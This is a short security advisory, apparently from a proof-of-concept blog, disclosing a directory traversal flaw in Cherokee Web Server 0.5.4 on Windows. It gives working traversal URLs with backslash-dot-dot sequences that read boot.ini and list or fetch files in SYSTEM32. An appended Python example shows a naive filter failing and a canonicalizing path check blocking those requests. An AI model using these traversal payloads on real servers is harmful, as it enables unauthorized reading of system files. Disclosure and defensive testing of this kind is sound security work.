#############################################################
# Cherokee Web Server <= 0.5.4 Directory Traversal Exploit
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.cherokee-project.com/download/windows
#############################################################

- Description -

Cherokee Web Server <= 0.5.4 is a Windows based HTTP server. This is the latest
version of the application available.

Cherokee Web Server <= 0.5.4 is vulnerable to remote directory traversal attack by the
following means.

Default webroot is C:\Program Files\Cherokee\www [3 levels deep] adjust accordingly.

- Technical Details -

http://[webserver IP]/[\../]

http://172.16.2.101/\../\../\../boot.ini
http://172.16.2.101/\../\../\../WINDOWS\SYSTEM32 <- Full Directory Listings through Browser
http://172.16.2.101/\../\../\../WINDOWS\SYSTEM32\calc.exe <- File access in context of web browser instance

#[pocoftheday.blogspot.com]
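For defenders, the following added example (not part of the original advisory and not Cherokee's code) shows a request-path check that canonicalizes with Windows path rules before testing containment in the webroot, so the `\../` form above is rejected. The function names and the `naive_is_safe` filter are hypothetical; the webroot and sample request paths are taken from the advisory.

```python
import ntpath
from urllib.parse import unquote

WEBROOT = r"C:\Program Files\Cherokee\www"  # default webroot named in the advisory

def naive_is_safe(url_path):
    """Hypothetical weak filter (not Cherokee's code): forward-slash pattern only."""
    return "/../" not in url_path

def resolve_request_path(url_path, webroot=WEBROOT):
    """Return the canonical file path under webroot, or None if the request escapes it.

    ntpath applies Windows rules (both '\\' and '/' separate components) on any host OS.
    """
    decoded = unquote(url_path)
    # Reject NUL bytes and ':' (drive letters, alternate data streams) outright.
    if "\x00" in decoded or ":" in decoded:
        return None
    # Drop leading separators of either kind so join() cannot be re-rooted.
    relative = decoded.lstrip("/\\")
    root = ntpath.normpath(webroot)
    candidate = ntpath.normpath(ntpath.join(root, relative))
    # Compare canonical forms; Windows paths are case-insensitive.
    c, r = ntpath.normcase(candidate), ntpath.normcase(root)
    if c == r or c.startswith(r + "\\"):
        return candidate
    return None

# Constructed sample: two benign paths plus the request paths from the advisory.
SAMPLE_PATHS = [
    "/index.html",
    "/img/../index.html",
    "/\\../\\../\\../boot.ini",
    "/\\../\\../\\../WINDOWS\\SYSTEM32",
    "/\\../\\../\\../WINDOWS\\SYSTEM32\\calc.exe",
]

def rejected(paths):
    """Paths that resolve outside the webroot."""
    return [p for p in paths if resolve_request_path(p) is None]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p!r:50} naive_ok={naive_is_safe(p)!s:5} resolved={resolve_request_path(p)}")
```

The substring filter passes all three advisory paths and blocks the harmless `/img/../index.html`, while the canonicalize-then-compare check gets both right.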